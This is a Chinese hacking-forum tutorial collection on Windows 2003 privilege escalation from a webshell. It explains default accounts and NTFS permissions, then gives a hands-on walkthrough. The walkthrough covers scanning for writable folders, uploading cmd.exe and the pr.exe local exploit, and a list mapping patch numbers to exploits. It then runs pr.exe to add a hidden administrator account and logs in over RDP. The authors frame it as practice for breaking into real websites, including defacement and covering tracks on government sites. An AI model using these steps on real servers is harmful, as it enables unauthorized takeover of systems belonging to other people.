法客论坛 - F4ckTeam

开站一周年提权专题文集



整理: 哼哼哈哈

修改: M3loee

目 录

第一章	提权的基本知识	
	第1节 Windows2003 下的默认用户权限	
	第2节 Windows 2003 服务器默认文件夹权限	
	第3节 Windows2003 Webshell 默认权限	5
	第4节 本地溢出提权	
	第5节 Sql Server 提权	
	第6节 Mysql 提权	
	第7节 ASP 环境下的 Shell. application	
	第8节 ASPX 环境下的 DOS 命令执行	
	第9节 PHP 环境下的 DOS 命令执行	
	第10节 Windows 提权中敏感目录和敏感注册表的利用	
第二章	提权实例	
	第1节记一次突破星外以及 secure RDP 提权	
	第2节 从简单 shell 到突破 360+天网提权	
	第3节 跟着黑客走吃喝全都有,提权 (一)	
	第4节 跟着黑客走吃喝全都有,提权 (二)	
	第5节N点主机提权	
	第6节 记一次N点提权	
	第7节在CMDSHELL无法执行情况下MYSQL的提权	
	第8节 Radmin 提权服务器过程	
	第9节 记一次突破安全狗传马提权	
	第10节 记一次有趣的提权IFEO 劫持	
	第11节 台湾 BT 服务器提权及内网渗透	
	第12节 记一次曲折的 Win2008 提权	

第一章 提权的基本知识

第1节 Windows2003 下的默认用户权限

作者:小乖

邮箱: hx0c4k@gmail.com

来自:法客论坛-F4ckTeam

地址: http://team.f4ck.net

0x00 关键要点 0x01 WINDWOS2003 下各类用户 0x02 WINDWOS2003 常见用户组

0x00 关键技术要点

与权限提升密切相关的users组、administrators组权限,System、Administrator、Guest、IUSR_*、IWAM_* 帐户默认权限。

因为你刚拿到 webshell 一般都是 iis 用户默认的权限,我们所谓的提升权限就是从 iis 用户的权限中,通过某些方法拿到 system 或者 administrator 的权限,然后创建 administrator 的用户,来进行我们的下一步操作。

其他组的话大家大概了解一下有这么回事就 ok 了。这里由于本人域 ad 方面学的不是很好,也没进行 过那方面的提权。 -- 其实道理也差不多吧,一通百通。

提升权限就好比你原来是会员,然后通过发掘了这套系统的漏洞,执行了某种数据库执行语句,之后 你成为了这个论坛的创始人。

刚开始学习,基础和理论部分都是很重要的,希望大家能耐心的看完,认真的去理解。

用户组和用户的关系

用户组就好像一个容器,只要进入组里面的人,他全部都具有这个组默认的权限。

用户就是单个的一个一个人。

0x00 WINDWOS2003 下各类用户:

SYSTEM : 从理论上说 System 是最高权限用户,使用普通的用户管理工具通常是查看不到他们的,可理解为 WINDWOS 本身帐户,一些大型系统软件也拥有此帐号权限,比如 MSSQL,MYSQL(在 没降权的情况下).

Administrator: 基本上是本地机器上拥有最高权限的用户; 你可以对它重命名, 但是不能删除 Guest: 只拥有相对极少的权限, 在默认情况下是被禁用的

IUSR_*、IWAM_*:都是在安装 IIS 后出现的内建帐号; IUSR_*----如果装了 IIS,访问 IIS 的用户都 是使用这个帐号来匿名访问 IIS;它是 GUEST 组的成员之一。IWAM_*----如果装了 IIS,各种 IIS 就用程序就将运行在这个帐户下,它是 IIS——WPG 用户组的成员之一

*后面的字符是随机生成的,每一台的机器创建出来的 iis 用户都不同。

0x01 WINDWOS2003 常见用户组

Administrators: 这个用户组在本地机器上拥有最高权限(SID: S-1-5-32-544) Backup Operators: 虽然不如 Administrators 大,但也差不多

Guests: 与 USERs 组权限相同(但 Guests 组的权限比 USERs 组更低,因为在 win2003 下默认的一些 文件夹权限里面是不包含 Guests 组的,更多的是 Users 组的可读权限 0.0)

Distributed COM Users: 分布式系统帐号, 涉及到域及域控制器等知识

Network Configuration Operators:: WINDOWS2003 中新增的用户组,这个用户组有足够的权限去管理网络配置情况(例如修改 ip 地址神马的。)

Performance Log Users: WINDWOS2003 中新增用户组,这个用户有权从远程安排性能计数器的日志工作

Performance Monitor Users,WINDOWS2003 新增用户组,这个用户组有权从远程监控计算机的运行 情况

Power Users:低于 ADMINISTRAOTRS,但远高于 GUEST,不能将添加管理员。

Print Operators:不如 ADMINISTRATOR 大,但是差不多

Users:本地机器上所有的用户帐户:这是一个低权限的用户组(SID: S-1-5-32-545)

IIS_WPG: WINDOWS2003 新增用户组:如果安装了 IIS,用来运行和种 WEB 应用程序的帐户将被 容纳在这个用户组里

Everyone: 这里不得不说下这个,就是代表全部用户组,如果一个目录里面有 everyone 的可读可写 可执行的,然后又支持 cmd 就可以各种 xx 了.

大家有时间的可以去看下我下面贴的这个 baidu 百科的一些 windows 权限的详细。。

http://baike.baidu.com/view/583933.htm

第2节 Windows 2003 服务器默认文件夹权限

作者:小乖

邮箱: hx0c4k@gmail.com

来自:法客论坛-F4ckTeam

地址: http://team.f4ck.net

0x00 前言

0x01 Windows 目录的权限

0x02 权限的四个特性——继承性、累加性 、优先性、交叉性

0x03 三种文件和文件夹属性

0x04 系统盘默认权限设置

0x00 前言

前三章都是讲理论的,希望大家不要嫌我在这里啰嗦.

我希望大家看完这套文章以后,可以清楚的了解 windows 下 ntfs 的安全 权限设置神马的.

不希望你们只是会利用我文章里的那些知识照搬,如果遇到特殊情况就不知道如何好办了.

有些朋友不会找可写的目录,然后之前看到别人的提权教程或者文章里的那个路径里拼命丢 cmd 和 pr 丢,半天都没进去,问我要了个兔杀的还是不行...

无奈之下丢给我,我去找了下可写目录,我去执行 cmd 和 pr 完事了.

完事后问了他才知道,他只对着那教程里的去机械化操作,而不会变通.

在这里希望大家能认真看完我这套文章,能够做到举一反三,看到我的思路可以去模仿,去学习,

而不是机械化的去操作.真正的学会怎么去提升权限.还有些人估计没认真看别人写的文章,自己也不了解权限的问题,看到别人在 webshell 上面 直接 net user xx xx /add & net localgroup 然后 3389 连

接就上去了,大哥人家那是 system 权限,然后你自己去搞站的时候就 net user 为什么不行了呢???--因为你的是普通的 guest!!我后面会讲到为什么会有 system 权限.自己的知识有限希望在这方面有人能提供一下资料.你光看我的文章也是没用的,最重要是去实战,比如我在自己空间里发了一文章,说免费提权,-- 就有很多朋友不会提权的找上我来,其中我也增加了实战经验,也把自己学到的牢牢记住了.(个人不太建议你们这样做,如果他们搞的是 gov 神马的,你自己没擦除脚印的痕迹习惯的话,你懂的..)

文笔虽然不是很好,但只要你们说出来我都会尽力去改.0.0

在讲 windows 目录权限前先说一下 ntfs, 什么是 ntfs 呢?其实就是一种硬盘的格式,我们一般用 windows95-98,都是 fat32,winxp 默认情况下也是 fat32,我个人记得装过 xp 的 ntfs 貌似也没安全设置,记得不太清楚了很长时间以前,大家可以去考证一下。。win03 的有安全设置。(--类似这种家用 的系统都是 fat32 硬盘格式的,大家可以右击自己的硬盘看看是 fat32 的还是 ntfs 的呢.在 vista 起微软 公司已经开始用 ntfs 取代 fat32 了,vista 系统开始都是 ntfs 的硬盘格式。参考一下 ntfs <u>http://baike.baidu.com/view/381.htm</u>) fat32 就不能像 ntfs 这种格式那样转换,打个比方人家一个是 VCD,一个是 CD-ROM, VCD 是不能往上写东西的,你 CD-ROM 是可以用刻录机往上写东西的,你拿个 VCD 说怎么用刻录机往上面写东西,那就说的是废话了。。你必须是一个 CD-ROM 的光盘。这也是一样我们谈 windows 权限设置,有个条件就是 ntfs,千万不要有人说 fat32 那上面怎么设置权限啊?那么我告诉你--,fat32 是不能设置权限的。如果你能把 fat32 设置权限那么你就是大黑阔了,你已经发现了一枚微软 0day,我恭喜你。

0x01 Windows 目录的权限

(1) 完全控制(修改、读取和运行、列出文件夹目录、读取、写入)

"完全控制"就是对目录拥有不受限制的完全访问。地位就像 Administrators 在所有组中的地位一样。 选中了"完全控制",下面的五项属性将被自动被选中。

(2) 修改

"修改"则像 Power users,选中了"修改",下面的四项属性将被自动被选中。下面的任何一项没有被选中时,"修改"条件将不再成立。

(3) 读取和运行

"读取和运行"就是允许读取和运行在目录下的任何文件,"列出文件夹目录"和"读取"是"读取和运行" 的必要条件。(运行的权限是作为一个来讲的,注意分类--,运行是什么意思呢,就是在那个目录下有个 pe 文件,也就是 exe 文件,你要是有运行权限的话,你就能运行它,如果你没有运行权限只有读取权限, 那么你就不能运行它.)

有些人入侵了某些网站,他有 cmd 权限,他就想在 web 目录下上传一个远控,然后运行,不就拿到权限了 么?你所在的那个目录里没有运行的权限,你自然就运行不了那远控,当然还有一些是远控权限方面的 问题导致远控不能运行,如果那么简单的话,我也不用花时间来整合一些资料,写这些文章,直接上远控, 马上完事.所以就要通过查找一些可写的目录来执行我们的提权工具什么的.

(4) 列出文件夹目录

"列出文件夹目录"是指只能浏览该卷或目录下的子目录,不能读取,也不能运行。

(5) 读取

"读取"是能够读取该卷或目录下的数据。

(6) 写入

"写入"就是能往该卷或目录下写入数据。

比如你公司的 ftp 里面有人写了你的坏话,--然后你要去把它改写成其他内容,这时候你就要有写入的 权限.

(7) 特别的权限。

而"特别"则是对以上的六种权限进行了细分.

有些人说他在目录里明明有这些权限,但为什么操作不了呢?这种情况大多数都是在特殊的权限里面 设置的.

比如说你修改某个网站的主页,你能在这个网站新建文本,html 新建目录什么的,还能修改其他的文件 内容,但偏偏不能修改这个主页的内容,这种情况大多数就是靠特殊权限设置的.又或者在服务器上有 什么安全软件防止你修改..

0x02 权限的四个特性——继承性、累加性、优先性、交叉性

继承性:比如说我一级目录是 windows 二级目录是 sun,windows 是个父亲,sun 是个儿子,儿子继承父亲,比如父亲文件夹里给了什么权限,通常儿子就有什么权限,就好比一个人继承遗产(这个有点不太好 听--呃)。。父亲里面 administrator 有完全控制权限的,在儿子目录里 administrator 一般情况下就有完全 控制权限,在右击属性高级里面设置(默认情况下是勾选继承权限的)..你修改了父亲文件夹里的权限,添加了个 user 的读取权限,那么儿子的目录就会多了一个 user 的读取权限.

累加性: 就好比兄弟的关系,比如一个用户组 test,他有一个哥哥用户和弟弟用户,弟弟对文件夹 sun 有读取的权限.哥哥对 sun 文件夹有写入的权限.这个组对这个文件夹的权限就是哥哥+弟弟的权限,test 组就拥有了读取和写入的权限.

优先性:有些人在目录里设置了又有读取权限,又拒绝访问,在这种情况下 windows 默认是拒绝权限优先。比如 test1 在 sun 文件夹里有完全的权限,但他为什么偏偏不能删除呢,就是因为拒绝删除的权限优先,管理员在特殊权限里设置了拒绝删除。

交叉性: 当你把新建一个 txt 文本设置在 a 目录,在 a 目录下他是有写权限的,你把他拷贝复制到 b 目录下,先想想你复制过去的这个 txt 文本他是什么权限的? 那么我告诉你,在同一个分区下,原来 那个文件他它是什么权限的,复制过去 b 目录它就是什么权限的。比如它不能删除,那么你拷贝到 b 目录里它就不能删除.如果你是剪切的话,那么b 目录原来是什么权限,默认情况下继承的它就是什么 权限。

0x03 三种文件和文件夹属性 只读: 顾名思义,只能读,不能修改 系统: 被隐藏保护通常不会显示 隐藏: 隐藏不显示

0x04 系统盘默认权限设置 c:\ administrators 全部(该文件夹,子文件夹及文件) CREATOR OWNER 全部(只有子文件来及文件) system 全部(该文件夹,子文件夹及文件) IIS_WPG 创建文件/写入数据(只有该文件夹) IIS_WPG(该文件夹,子文件夹及文件) 遍历文件夹/运行文件 列出文件夹/读取数据 读取属性 创建文件夹/附加数据 读取权限 c:\Documents and Settings administrators 全部(该文件夹,子文件夹及文件) Power Users (该文件夹,子文件夹及文件) 读取和运行 列出文件夹目录 读取 SYSTEM 全部(该文件夹,子文件夹及文件) C:\Program Files administrators 全部(该文件夹,子文件夹及文件) CREATOR OWNER 全部(只有子文件来及文件) IIS_WPG (该文件夹,子文件夹及文件) 读取和运行 列出文件夹目录 读取 Power Users (该文件夹,子文件夹及文件) 修改权限 SYSTEM 全部(该文件夹,子文件夹及文件) TERMINAL SERVER USER (该文件夹,子文件夹及文件) 修改权限

第3节 Windows2003 Webshell 默认权限

作者:小乖 邮箱:hx0c4k@gmail.com 来自:法客论坛-F4ckTeam 地址:http://team.f4ck.net

0x00 前言 0x01 Windows2003 默认配置 0x02 Windows2003 典型配置的权限 0x03 cmd 运行的条件

0x00 前言

这一章主要讲解关于我们刚拿到 webshell 的默认权限,这一章主要集中一下,我们常常要入侵所拿下 一个网站的权限后,得到的所谓 webshell,他到底在 windows 下具有什么样的默认权限呢。

很多人虽然通过一些已知的漏洞拿下一个小的网站,比如上传一些木马,得到 webshell,而且呢说自己也会挂木马,比如修改网站的首页,在上面加一个木马,让别人种远控,在那玩。

可他自己仍然搞不懂自己拿的这个 webshell 有什么作用,他能有什么样的权限,所以呢一些朋友问我的问题呢有点不知道咋回答--。

比如一些很经典的问题,我拿了一个 webshell 怎么才能开远程桌面呢?是不是直接上传个远控然后执行 cmd 命令呢?为什么执行不了?要怎么样才能打开远程桌面。--我就借着一些朋友经常问的问题来 大概说一下吧.(这一节课,估计写完后 jsp 和 php 的不用写了呃.--暂时还是不说着,卖个关子。)

怎样解决这些问题呢,首先我们得了解 webshell 的权限,通过上俩章的学习,应该明白我们所有对于那 个 iis 搭建的网站的访问,默认都是属于的 users 组[默认情况下是这样的],用的是 iis 的那个 IUSR_* 匿名账号[哪个匿名帐号?可以说清楚一点,带上截图]来访问的。这也就是说,我们的 webshell 的 权限是跟他一样的,默认是 users 组或者 guests 组[这是不准确的,默认是属于 users,降权的话就是 guest](在降权的情况下),这是一个基本的认识。然后,我们谈谈了解我们所具有的具体的那些权 限,比如前俩章介绍的,关于磁盘的访问权限等等,在这一章也要介绍。

说白了就是这样把我们具体放到那个环境当中,假设我们是那个 webshell,我们究竟有哪些权限。 这样的认识呢更具体,之前介绍的是,比较大范围的讲 windows 下面的这些用户,具有哪些权限, 包括什么管理员账号, system 账号,以及各种各样的管理组。实际上呢我们真正跟网络安全玩那个 黑客木马,webshell,包括提升权限,真正要打交道的就是一个 web 服务器软件 默认用户访问的权限。

这章我们就站在一个 webshell 的角度来看待我们到底具有哪些权限,这一节章的主要内容呢,就是介绍配置,和典型配置的 webshell 权限,包括读、写、执行、还有一些扩展权限、运行 cmd.

0x01 Windows2003 默认配置

默认设置

首要区别! 默认在 WINDOWS2003 下是没有安装 IIS 的

在这里要说一下默认下 windows2003 安装完毕后默认是不会安装 iis 的,和 windows2K 不一样,2K 在 安装完后会自动安装一个 iis5,这样会带来一个安装隐患,有一个 iis5 的远程溢出提权的漏洞,还貌似有 写入的权限[这个是要看 webdav 是否开启的吧?],只要知道一台web 的服务器安装了 iis5,而且这台服 务器在外网中,你就可以尝试使用 iis5 的远程溢出漏洞,来获取这台机子的权限.或者用 iiswrite 写入 webshell,然后对他进行提权.(写入要开启 webdav)

默认只安装静态 HTTP 服务器

IIS 6.0 的默认安装被设置为仅安装静态 HTML 页面显示所需的组件,而不允许动态内容,说的直白 点,也就是只能解析 htm、html 等静态网页,而不能解析 asp、asa 等动态网页[这是加上的]。 需要在 iis 管理器,点击 web 服务拓展,允许 Active Server Pages,这样才能解析动态网页。[加上的]

增强的文件访问控制

匿名帐号不再具有 web 服务器根目录的写权限。另外, FTP 用户也被相互隔离在他们自己的根目录中。这些限制有效的避免了用户向服务器文件系统的其他部分上传一些有害程序。例如攻击者可以向/scripts 目录上传一些有害的可执行代码,并远程执行这些代码,从而攻击 web 站点

父目录被禁用

IIS 6.0 中默认禁用了对父目录的访问。这样可以避免攻击者跨越 web 站点的目录结构,访问服务器 上的其他敏感文件,如 SAM 文件等。当然也请注意,由于父目录默认被禁用,这可能导致一些从早 期版本 IIS 上迁移过来的应用由于无法使用父目录而出错。[大多实际环境中都是启用了的]

坚持最小特权原则

IIS 6.0 坚持一个基本安全原则--最小特权原则。也就是说,HTTP.sys 中所有代码都是以 Local System 权限执行的,而所有的工作进程,都是以 Network Service 的权限执行的。Network Service 是 Windows 2003 中新内置的一个被严格限制的账号。另外,IIS 6.0 只允许管理员执行命令行工具,从而避免命 令行工具的恶意使用。这些设计上的改变,都降低了通过潜在的漏洞攻击服务器的可能性。部分基 础设计上的改变、一些简单配置的更改(包括取消匿名用户向 web 服务器的根目录写入权限,和将

FTP 用户的访问隔离在他们各自的主目录中)都极大地提高了 IIS 6.0 的安全性。

0x02 Windows2003 典型配置的权限

1、磁盘权限

系统盘及所有磁盘只给 Administrators 组和 SYSTEM 的完全控制权限

系统盘\Documents and Settings 目录只给 Administrators 组和 SYSTEM 的完全控制权限 系统盘\Documents and Settings\All Users 目录只给 Administrators 组和 SYSTEM 的完全控制权限 系统盘\Inetpub 目录及下面所有目录、文件只给 Administrators 组和 SYSTEM 的完全控制权限 系统盘\Windows\System32\cacls.exe、cmd.exe、net.exe、net1.exe 文件只给 Administrators 组和 SYSTEM 的完全控制权限

2. 不使用默认的 Web 站点,如果使用也要将 IIS 目录与系统磁盘分开 IIS 默认创建的 Inetpub 目录会被删除[语句不通顺](在安装系统的盘上)

3. 每个独立的要保护的个体(比如一个网站或者一个虚拟目录)创建一个系统用户,让这个站点在 系统中具有惟一的可以设置权限的身份

这什么意思呢,一个网站一个账号,在我们入侵虚拟主机的时候,有一个方法叫做旁注,相信大家 一定知道,以前用旁注入侵虚拟主机的速度不是一般的快,只要在几十个网站当中入侵了其中一个 网站,然后找到他所在的目录,就能跨过去,写入你的马,完成这次入侵。

但是在独立需要保护的个体,创建一个系统用户,这种情况下,一个账号对应一个网站,对应一个 目录,这种情况下,你的旁注就让失效了[需要配置完每个账户的权限之后才不能跨目录的]。或者说 想当难以利用,为什么呢?因为你本身一个账号,比如说以A站的A账号,那么A账号只能在A 站目录进行活动,你不能跑到B站的目录,因为你没有这个权限。B站同样也一样,他有个B用户, 他也不能跑到A站去活动。[这是需要单独配置的]

这时候,我们如果想通过旁注渗透进目标站点,就需要通过一些方法尝试能否提权[修改了],成功后, 再对[才能对]目标站进行修改主页。

有些刚学提权的,或许在某次比较幸运的时候遇到一些不会设置目录的管理员,故而利用旁注,入侵了 其他的站,当遇到会设置安全权限的管理员的时候,他入侵了 B 站,知道了 A 站的路径,但偏偏跳不过 去,那是因为你没有这个权限。

在典型的 WEBSEHLL 下,对于本站具有,读,写,修改,权限,目录下拥有相对的执行权限。可 以在指定的这个文件夹里,看他的文件,写入他的文件,也可以修改和删除它的文件,比如你可以 执行一部分 cmd 的命令,比如一些嗅探工具的命令,这些都是相对的。[是否允许执行,是看具体配 置的,默认是允许的](一般在 web 目录下是不允许执行 pe 文件的说)

0x03 cmd 运行的条件

在 iis 的用户下,iis 用户 asp 木马执行一些 cmd 命令时候需要 wscript(wscript.shell/shell.application) 的 支持.

而 aspx 的木马比如 aspxspy 是调用[是.net,不是 aspx].net 的组件,网上有网友提供了防止 aspx 运行 cmd 的方法就是禁止过程名字为 w3wp.exe 的运行任何外部 exe 文件。(--不知道哪位大神可以绕过 这个然后用 cmd 来执行命令呢?)

嗯,大概就这样说一下吧。说太多我后面会纠结的。

第4节本地溢出提权

作者:小乖

邮箱: hx0c4k@gmail.com 来自: 法客论坛-F4ckTeam 地址: http://team.f4ck.net

0x00 前言0x01 找可写目录0x02 运行 exploit 提权0x03 附录

0x00 前言

溢出漏洞就像杯子里装水,水多了杯子装不进去,就会把里面的水溢出来.

而相对计算机来说计算机有个地方叫缓存区,程序的缓存区长度是被事先设定好的,如果用户输入的数据超过了这个缓存区的长度,那么这个程序就会溢出了.缓存区溢出漏洞主要是由于许多软件没有对缓存区检查而造成的.

这一章大概就是说利用一些现成的造成溢出漏洞的 exploit 通过运行,把用户从 users 组或其它系统用 户中提升到 administrators 组.

首先 asp webshell 要支持 wscript(wscript.shell/shell.application)

地址 @) 🕘 http://ww	vw. h42	tOer.com/xg.asp			
H也北: E:\www					
(1) 【Program】 (2) 【Pr	ogran	D] (3) [pcAnywhere] (4) 【Documents(5) 【All_Users 】 (6)【開始_菜	單】 (7) 【程_序】 (8) 【RECYCLER (C: \)】 (9) 【RECYCLER (d: \)】 (10) 【RECYCLER (e: \)】
	<u> </u>				服装器组件信息
→〉訪點提日録			服务器名		www.b4xDer.com
→> 本程序目録			服务器IP		192.168.1.97 查询
→> Fso浏览器			服务器时间		2012-6-15 20:20:26
→> App浏览器			服务器CPU数量		
→> 新建目録			服务器操作系统		
→> 新建文本			WEB服务器版本		Microsoft-IIS/6.0
→〉上傳单一			Scripting.FileSystemObject	1	文件操作组件
→> 上傳批量			Wscript.Shell	1.1	命令行执行组件
→> 远程下載			ADOX. Catalog		ACCESS建库组件
→> CMD命令			JRO. JetEngine	~	ACCESS压缩组件
根据后有选择上上	/		Scripting, Dictionary	~	数据流上传辅助组件
凭伙信息収 来 ♦ ♦			Adodb. connection	4	数据库连接组件
→>磁盘信息			Adodb.Stream	4	数据流上传组件
→> 用尸账号	臣		SoftArtisans.FileUp	×	SA-FileUp 文件上传组件
→>端口	*		LyfUpload. UploadFile		刘云峰文件上传组件
→> 狙件支持			Persits, Upload, 1		ASPUpload 文件上传组件
→>~信息探针	一宗		JMail.SmtpMail		JMail 邮件收发组件
→> 查詢管理員			CDONTS. NewMail		虚拟SMTP发信组件
→> 端口掃描器			SmtpMail. SmtpMail. 1		SmtpMail发信组件
→> 請取註冊表			Microsoft, XMLHTTP		数据传输组件
→> Serv_u提櫂			Shell, Application		Application
→> Serv_uFTP					
→> Sql命令					

一般打开 webshell 里面都会有组件支持,看到 wscript.shell 旁边的勾选上了就支持 wscript,当然也有一些 webshell 会有诈胡的现象.--市面上的几款比较火的 webshell 貌似都有这些问题,帮朋友提权他的 webshell 有 wscript.shell 支持,然后找个目录执行 cmd 的结果不行,转到我那 webshell 上显示没 wscript.shell 支持..

或者 aspx 能调用.net 组件来执行 cmd 的命令.

这里主要用几款市面上比较多人利用的 windows exploit 提权的利用工具.

0x01 找可写目录

这里附上啊D写的asp版本扫描可写目录和欧欧写的aspx扫可写目录,最后附上一款我自己比较喜欢用来日星外时候的辅助 小手冰凉的aspx 通过查注册表然后获取路径,配合啊D的扫可写目录比较不错.这些工具我们都演示一遍吧.

地址(D) http://www.h4xOer.com/wt.asp

此程序可以检测你服务器的目录读写情况, 为你服务器提供一些安全相关信息! 输入你想检测的目录, 程序会自动检测子目录				
C:\WINDOWS				
C:\Documents and Settings				
C:\Program Files				
C:\WINDOWS\PCHealth				
C:\WINDOWS\system32				
C:\WINDOWS\Registration				
C:\WINDOWS\system32\spool				
C:\WINDOWS\Tasks				
C:\WINDOWS\7i24.com\FreeHost	-			
开始检测 🔽 测试目录 🗹 测试文件 🗆 显禁写目录和文件 🗹 不检测临时目录				

输入目录,然后点击开始检测,得出以下结果



蓝色是貌似是代表有一定的权限,未必可写(可能可读),红色是代表文件夹可写,红色的文件呢就是代表那个文件可写了,黑色是代表不存在该文件夹.

接下来演示一下欧欧写的 aspx 扫描,比较简单,一看就清楚了..

地址 ① 🙆 http://www.h4xOer.com/2.aspx						
startc:\ Stopat 5 files ScanWriterable						
c:\Documents and Settings\All Users\Application Data\Microsoft\Crypto\DSS\MachineKeys						
c:\Documents and Settings\All Users\Application Data\Microsoft\Crypto\RSA\MachineKeys						
c:\Documents and Settings\All Users\Application Data\Microsoft\HTML Help						
c:\Documents and Settings\All Users\Application Data\Microsoft\Media Index						
c:\Documents and Settings\All Users\Application Data\VMware\Compatibility\native						
c:\Documents and Settings\All Users\Application Data\VMware\Compatibility\virtual						
c:\Documents and Settings\All Users\Application Data\VMware\Compatibility						
c:\Documents and Settings\All Users\Application Data\VMware						
c:\Documents and Settings\All Users\Application Data						
usetime: 0.046875						
Code By <u>Www.hkmjj.Com</u>						

输入文件夹路径或者盘符 0.0,接着点击 ScanWrtieable 即可. 最后是演示一下小手冰凉写的这款通过读取注册表里的软件的路径,然后输出注册表里的数据,显示 软件安装所在的路径..配合啊 D 的目录读写检测 asp 版,可以快速的找到可写目录。



0x02 运行 exploit 提权 这里我已经找到了一个可写目录

c:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\0012F852\ 我们上传 cmd 试试吧.

上传路径: <mark>y</mark>	• Music\Sample	Playlists\0012	2F852\cmd. exe	Administrator	·\桌面\cmd.exe	刘党	上传		
恭喜小乖文	件c:\Documen	ts and Setting	s\All Users\	Documents\My	Music\Sample	Playlists\	0012F852\cm	d.exe上传成功 :	
				返回					

一些小技巧:有些安全软件或者一些管理员会在注册表或者安全策略神马的设置,限制运行 exe 后缀的 文件,有时候可以把上传的 cmd.exe 随便改名字,-0-在 webshell 下运行它不管你是不是 exe 后缀最终都 是以 exe 文件来运行..

点击 webshell 里面的 cmd 命令



输入我们刚才上传的 cmd.exe 的路径和文件名.勾选 WScript.Shell,我们这里看看我们现在用户的权限, 输入 whoami 点击执行.返回了一个信息

nt authority\network service

在第三章《windows2003 webshell 默认权限》里我讲过下面引用第三章

Network Service 是 Windows 2003 中新内置的一个被严格限制的账号。另外, IIS 6.0 只允许管理员执行命令行工具,从而避免命令行工具的恶意使用。这些设计上的改变,都降低了通过潜在的漏洞攻击服务器的可能性。部分基础设计上的改变、一些简单配置的更改(包括取消匿名用户向 web 服务器的根目录写入权限,和将 FTP 用户的访问隔离在他们各自的主目录中)都极大地提高了 IIS 6.0 的安全性。

0.0 该用户就是一个 users 组的,可以执行一些简单的命令. 但不能直接 net user 添加用户.有些黑客做 了后门所以让 webshell 在 iis 下运行有 system 权限.具体方法参考 0x03 附录.

我们在运行 exploit 前一般会输入 systeminfo 这命令.或者通过查询 c:\windows\ 里留下的补丁号.log 来看看服务器大概打了哪些补丁

附上对应补丁号

KB2360937 MS10-084

KB2478960 MS11-014

KB2507938 MS11-056

KB2566454 MS11-062

KB2646524 MS12-003

KB2645640 MS12-009

KB2641653 MS12-018

KB952004 MS09-012 Pr.exe

KB956572 MS09-012 巴西烤肉

KB971657 MS09-041

KB2620712 MS11-097

KB2393802 MS11-011 ms11011.exe

KB942831 MS08-005

KB2503665 MS11-046 ms11046.exe

KB2592799 MS11-080 ms11080.exe



0.0 没打补丁也.接着在那可读可写可执行的目录下,上传我们的 exploit.

恭喜小乖文件c:\Documents and Settings\Al	1 Vsers\Documents\My M	Music\Sample	Playlists\0012F852\pr	.exe <mark>上传成功</mark> ?	
	近回				
	Į				
<mark>SHAN 路径:</mark> c:\Documents and Settings\All Users\Documents\Wy Wusic\Sample	Playlists\0012F852\cmd.exe			🗹 Script. Shell	
<mark>अत्यासिद्धः</mark> c:\Documents and Settings\All Vsers\Documents\My Husic\Sample c:\Documents and Settings\All Vsers\Documents\My Husic\Sample Playlists\C	Playlists\0012F852\cmd.exe 1012F852\pr.exe			🗹 (Script. Shell	执行
SHOTTARE: c:\Documents and Settings\All Users\Documents\My Husic\Sample c:\Documents and Settings\All Users\Documents\My Husic\Sample Playlists\C	Playlists\0012F852\cmd.exe 1012F852\pr.exe			KScript.Shell	执行
<mark>अधामितिहः</mark> c:\Documents and Settings\All Users\Documents\My Husic\Sample c:\Documents and Settings\All Users\Documents\My Husic\Sample Playlists\C	Plsylists\0012F852\cmd.exe 0012F852\pr.exe			⊠ WScript Shell	执行
<mark>अत्यामिहिन्दिः</mark> c:\Documents and Settings\All Users\Documents\My Husic\Sample c:\Documents and Settings\All Users\Documents\My Husic\Sample Playlists\C	Playlists\0012F852\cmd exe 0012F852\pr.exe			🔽 WSeript Shell	执行

执行 pr,为什么不回显呢?

我在这里解答一下吧,因为上传的文件的路径 文件夹里面有 空格 c:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\0012F852\

我们换个路径吧

C:\RECYCLER



看到没有,有回显了. Pr 的使用方法就是 文件所在的路径 + "cmd 命令".



C:\RECYCLER\pr.exe "whoami" 返回数据,system 权限 0.0.可以直接添加 administrator 的用户.

mul (3) kpcAnywherel (4) Kuocuments(5) KALL_Users l (5) KBRR日光単l (1) KHE_JFl (8) KHEUTULEK(C:\)』 (3) KHEUTULEK(C:\)』	
3901課任: : Wordments und Settings/All Users/Dordments/My Music/Sample Playlists/00127852/cmd.exe 🔽 🔽 🕼	
C:\RECTCLER\pr.exe "net user xiaoguai A#x0er.com /add & net localgroup administrators xiaoguai /add"	执行
fxxoo/>DuildMChange By p fxxoo/->This exploit gives you a Local System shall /xxoo/->Thim Wing process Fid: 2588 begin to try /xxoo/->Tomad token SISTEM /xxoo/->Tomadinet user xiaoguai h4xOer.com /add & net localgroup administrators xiaoguai /add 命令成功完成。	<u></u>
命令成功完成。	

C:\RECYCLER\pr.exe "net user xiaoguai h4x0er.com /add & net localgroup administrators xiaoguai /add" 添加一个 xiaoguai 的账号,密码是 h4x0er.com,把 xiaoguai 这个账号添加进 administrators 这个组里面.

接着我们就查看一下 3389 的端口.点击读取注册表,读取

 $HKLM \ SYSTEM \ CurrentControlSet \ Control \ Terminal \ Server \ WinStations \ RDP-Tcp \ PortNumber$

这个键里面的值.

(I) Krrogram (2) Krr	08	"amb J (5) Kpcknywherel (4) Kuceuments(5) KALL_Users J (5) K用如白米車l (1) K種山中J (5) KhzeleLzk((.()) (3) KhzeleLzk((.()) (1) KhzeleLzk(
	^	<u>注册表键值读取</u>
磁盤文件操作↓↓		
→> 站點根目錄		3389端口
→>本程序目録		HKLM/SYSTEM/CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\FortNum 读取键值
→> Fso浏览器		
→> App浏览器		• 3389
→> 新建目録		
→> 新建文本		
→> 上傳单一		
→> 上傳批量		
→> 远程下载		
→> CMD命令		
提权信息收集↓↓		
→>磁盘信息		
→> 用户账号		
→> 端口_網絡		
→> 組件支持		
→> 信息探针		
→> 查詢管理員		
→> 端口掃描器		
→> 讀取註冊表		
→> Serv_u提權		
→> Serv_uFTP		
→> Sql命令		
→> MS_sql提权		
→> Radmin讀取		
→> pcanywhere		

然后就直接 3389 登陆吧,如果登陆不上的话,参考一下附录下的解决方法.

Newww.h4x0er.com - 远程桌面连接				
● Tindors 任务管理器	3			<u>^</u>
应用程序 进程 性能 联网 用户				
「カデー」のション 4人名 - 中の一部の名	2.92			
	[;] 理您的服务器 溜: №IXXXIN-A42FD82	搜索帮助和支持中心		
	甲您的服务器角色		工具和更新 (<u>r</u> .)	E
	在这里找到的工具和信息来添加或删除角色,并执行您的 管理任务。	▶ 添加或删除角色 ● 阅读有关服务器角色的信息 ● 図述大干证現等理的信息	管理工具 更多工具 Windows Update	
